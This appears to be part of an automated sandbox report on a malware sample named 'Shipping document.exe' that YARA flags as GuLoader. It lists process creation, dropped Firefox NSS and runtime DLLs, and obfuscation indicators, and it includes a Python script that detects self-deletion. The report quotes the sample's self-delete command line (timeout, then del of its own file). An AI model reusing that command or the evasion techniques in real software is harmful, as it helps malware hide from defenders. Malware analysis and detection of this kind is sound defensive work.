Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Shipping document.exe | Virustotal: Detection: 50%
Source: Shipping document.exe | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
Source: unknown | Process created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Shipping document.exe | Process created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
Source: C:\Users\user\Desktop\Shipping document.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
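The process tree in the rows above carries two detection-worthy patterns: the sample launches a second copy of its own image (the suspended child the injection signatures refer to), and the second instance then runs cmd.exe with `timeout.exe 3 & del 'Shipping document.exe'` so that the file on disk is removed once the parent has exited and released its lock. The script below is an added example of detection logic over process-creation events; it is not part of the sandbox report and not Joe Sandbox code. The event records are constructed to mirror the tree in this report (pids, the parent of cmd.exe and the event field names are assumptions; real telemetry such as Sysmon event 1 carries the same fields under different names).

```python
"""Flag self-deletion via cmd.exe and self-spawn in process-creation events (added example)."""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Matches "del <file>" where <file> may be quoted; stops at an "&" chain or end of line.
DEL_RE = re.compile(r"""\bdel\b\s+['"]?(?P<target>[^'"&]+?)['"]?\s*(?:&|$)""", re.IGNORECASE)
# A "timeout N" (or "timeout.exe N") in the same command line means the delete is deferred
# until the parent has had time to exit, which is what makes the self-delete succeed.
TIMEOUT_RE = re.compile(r"\btimeout(?:\.exe)?\s+\d+", re.IGNORECASE)

# Constructed events mirroring the report's tree (pids are made up).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\Shipping document.exe", r"'C:\Users\user\Desktop\Shipping document.exe'"),
    ProcEvent(1001, 1000, r"C:\Users\user\Desktop\Shipping document.exe", r"'C:\Users\user\Desktop\Shipping document.exe'"),
    ProcEvent(1002, 1001, r"C:\Windows\SysWOW64\cmd.exe",
              r"'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'"),
    ProcEvent(1003, 1002, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1004, 1002, r"C:\Windows\SysWOW64\timeout.exe", r"C:\Windows\system32\timeout.exe 3"),
]


def _base(path):
    return ntpath.basename(path.strip()).lower()


def self_delete_findings(events):
    """Return (parent_pid, description) for every cmd.exe that deletes its parent's image."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if _base(e.image) != "cmd.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        m = DEL_RE.search(e.cmdline)
        if not m:
            continue
        # Compare file names only: the del target is usually relative to the parent's directory.
        if _base(m.group("target")) == _base(parent.image):
            delayed = bool(TIMEOUT_RE.search(e.cmdline))
            desc = "self-deletion via cmd.exe" + (" (delayed with timeout)" if delayed else "")
            findings.append((parent.pid, desc))
    return findings


def self_spawn_findings(events):
    """Return (parent_pid, child_pid, description) where a process starts its own image again."""
    by_pid = {e.pid: e for e in events}
    out = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image.lower() == e.image.lower():
            out.append((parent.pid, e.pid, "process launched a second copy of its own image"))
    return out


if __name__ == "__main__":
    for f in self_delete_findings(SAMPLE_EVENTS) + self_spawn_findings(SAMPLE_EVENTS):
        print(f)
```

Self-spawn on its own is common for legitimate software (browsers, updaters), so the second rule is only useful in combination with the first or with the suspended-creation flag from the sandbox; the self-delete rule is far more specific and is the one worth alerting on directly.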
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Shipping document.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392869610.000000001EF74000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392772745.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392644017.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392702790.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.392772745.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392869610.000000001EF74000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match File source: 00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Shipping document.exe PID: 7044, type: MEMORY
            Source: Yara match File source: Process Memory Space: Shipping document.exe PID: 7132, type: MEMORY
            Binary contains a suspicious time stamp
            Source: initial sample Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader Generic
            Source: Yara match File source: Process Memory Space: Shipping document.exe PID: 7044, type: MEMORY
            Source: Yara match File source: Process Memory Space: Shipping document.exe PID: 7132, type: MEMORY
            Source: Shipping document.exe Static PE information: real checksum: 0x2029d should be: 0x16376
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_0040406B push ds; ret 0_2_0040425E
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00406CD5 push ds; ret 0_2_00406CD6
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00408091 push ds; ret 0_2_004080A2
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_0040596A push FFFFFF80h; retf 0_2_004059C2
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00407509 push FFFFFF80h; retf 0_2_00407546
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_0040412B push ds; ret 0_2_0040425E
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_004091FC push edx; iretd 0_2_004091F7
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00409183 push edx; iretd 0_2_004091F7
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00405E75 push ds; ret 0_2_00405E76
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00409684 push edx; iretd 0_2_0040968B
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_004056A1 push ds; ret 0_2_004056A2
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00409EB5 push 528716C7h; iretd 0_2_00409EBB
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00406FC6 push edx; iretd 0_2_00406FC7
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00409B86 push 9A01635Eh; retf 0_2_00409B96
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_00407FB5 push edx; iretd 0_2_00407FBB
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_02210C02 push FFFFFFB9h; retf 0_2_02210C09
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 0_2_02217557 push 524B9F7Bh; ret 0_2_0221755D
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_00061C0F push esp; ret 1_3_00061C11
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_0006244F pushfd ; iretd 1_3_0006240B
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_00065496 pushfd ; iretd 1_3_0006549B
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_000658EB push ds; retf 1_3_000658FD
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_000654F5 pushfd ; retf 1_3_000654F6
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_000648FD push esp; ret 1_3_000648FE
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_00064D18 push esp; iretw 1_3_00064D42
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_0006113B pushfd ; retf 1_3_0006113F
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_00064D7C push esp; iretw 1_3_00064D42
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_00064DA8 push esp; iretw 1_3_00064D42
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_000615C1 pushfd ; iretd 1_3_000615CB
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_000645CA pushfd ; retf 1_3_000645CB
            Source: C:\Users\user\Desktop\Shipping document.exe Code function: 1_3_000623FA pushfd ; iretd 1_3_0006240B
            Source: initial sample Static PE information: section name: .text entropy: 7.13058537401
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-1.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-sysinfo-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-time-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-utility-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-profile-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-convert-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-stdio-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-environment-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\msvcp140.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-errorhandling-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-util-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-memory-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-2-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\freebl3.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-multibyte-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-handle-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-localization-l1-2-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\nssdbm3.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-private-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-rtlsupport-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\nss3.dll
